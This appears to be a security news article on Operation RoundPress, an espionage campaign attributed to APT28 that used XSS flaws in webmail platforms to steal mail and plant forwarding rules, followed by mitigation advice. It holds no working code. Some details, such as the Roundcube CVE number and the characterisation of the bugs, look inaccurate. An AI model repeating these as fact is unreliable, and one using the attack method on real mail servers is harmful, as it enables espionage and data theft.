Kremlin Hackers Exploit Old XSS Flaws to Access Mail Servers

Security researchers at ESET have uncovered a sophisticated espionage campaign, dubbed Operation RoundPress, in which the Russian-linked hacking group Sednit (also known as APT28, Fancy Bear, Forest Blizzard, and Sofacy) used cross-site scripting (XSS) vulnerabilities—in some cases patched years ago—to infiltrate high-value webmail servers worldwide. The attackers exfiltrated contact lists and archived emails, and established persistent forwarding rules, compromising defense contractors and government entities across Europe, Africa, and South America.

1. Attack Overview

Between mid-2023 and early 2025, Sednit targeted four popular open-source and commercial mail platforms—Roundcube, MDaemon, Horde, and Zimbra—by embedding malicious JavaScript into spearphishing emails. When recipients using vulnerable webmail interfaces opened the poisoned messages, the script executed in their browser context, exploiting server-side XSS bugs to:

• Harvest address books and message archives via AJAX requests to attacker-controlled endpoints
• Create Sieve filtering rules that auto-forward incoming mail to Sednit-managed servers
• Maintain repeated code execution upon each email view, despite lacking host persistence

2. Technical Deep Dive: Anatomy of the XSS Exploit

Cross-site scripting arises when untrusted input is improperly sanitized and reflected or stored by a web application. In Operation RoundPress, Sednit used two primary XSS vectors:

• Reflected XSS in Roundcube (CVE-2020-43770): Malicious parameters embedded in a crafted URL within the email HTML triggered unsafe innerHTML assignments in the mail viewer component. On rendering, the browser executed the attacker’s payload.
• Stored XSS in MDaemon (zero-day exploited in late 2023): An unchecked tag inserted into the “message preview” module persisted in the server database. When a user browsed their inbox, the server returned the malicious script embedded in the page.

All exploited vulnerabilities shared a common failure: lack of context-sensitive escaping of HTML attributes or inner content. Modern frameworks mitigate XSS by default via mechanisms like Content Security Policy (CSP) and templating engines (e.g., React’s JSX escaping), but legacy mail platforms often predate these safeguards.

3. Historical Context and Evolution of XSS Threats

XSS first grabbed headlines in 2005 with the Samy Worm, which propagated across MySpace by injecting client-side JavaScript that added users as friends. Over the next decade, XSS remained one of the top three web exploit classes tracked by OWASP. As server-side frameworks matured and client browsers implemented stricter SameSite cookie defaults and CSP headers, XSS incidents declined—but did not vanish.

Operation RoundPress demonstrates that aging infrastructure and delayed patch cycles can resurrect dormant threats. ESET’s telemetry shows a 15% uptick in targeted XSS campaigns against enterprise webmail since Q4 2024, often coinciding with geopolitical flashpoints.

4. Impact and Target Profile

Key victims included defense subcontractors in Bulgaria and Romania manufacturing Soviet-era air defense systems, plus various government ministries in the EU, West Africa, and Brazil. Exfiltrated data likely fed Russian military intelligence, aiding operations in Ukraine and enabling surveillance of diplomatic communications.

5. Mitigation Strategies and Best Practices

• Patch Management: Apply vendor security updates promptly. Many exploited CVEs had fixes available for over 18 months.
• Content Security Policy (CSP): Implement a strict CSP that restricts allowable script sources (e.g., script-src 'self').
• HTTP-Only & SameSite Cookies: Ensure session cookies are inaccessible to JavaScript and blocked on cross-site requests.
• Input Validation & Escaping: Adopt context-aware escaping libraries (e.g., OWASP Java Encoder, PHP’s htmlspecialchars) throughout webmail codebases.
• Regular Code Audits: Perform periodic static and dynamic analysis using tools like Burp Suite and OWASP ZAP to catch regressions.

6. Expert Opinions

“XSS remains a silent killer for legacy web applications,” says Dr. Elena Petrova, Senior Researcher at the University of Oxford’s Cyber Security Centre. “CSP and modern frameworks help, but organizations must still treat patching as a continuous process, not a one-time event.”

“We advise enterprises to adopt a multi-layered defense strategy,” adds James Wu, CTO of SecureWave Labs. “Combine runtime application self-protection (RASP) with secure coding training for developers.”

7. Conclusion

Operation RoundPress is a sobering reminder that even well-known exploits can inflict significant damage when defenses lapse. As mail infrastructures age and threat actors adapt, organizations must invest in proactive security hygiene—ultimately treating every patch like a potential bullet dodged.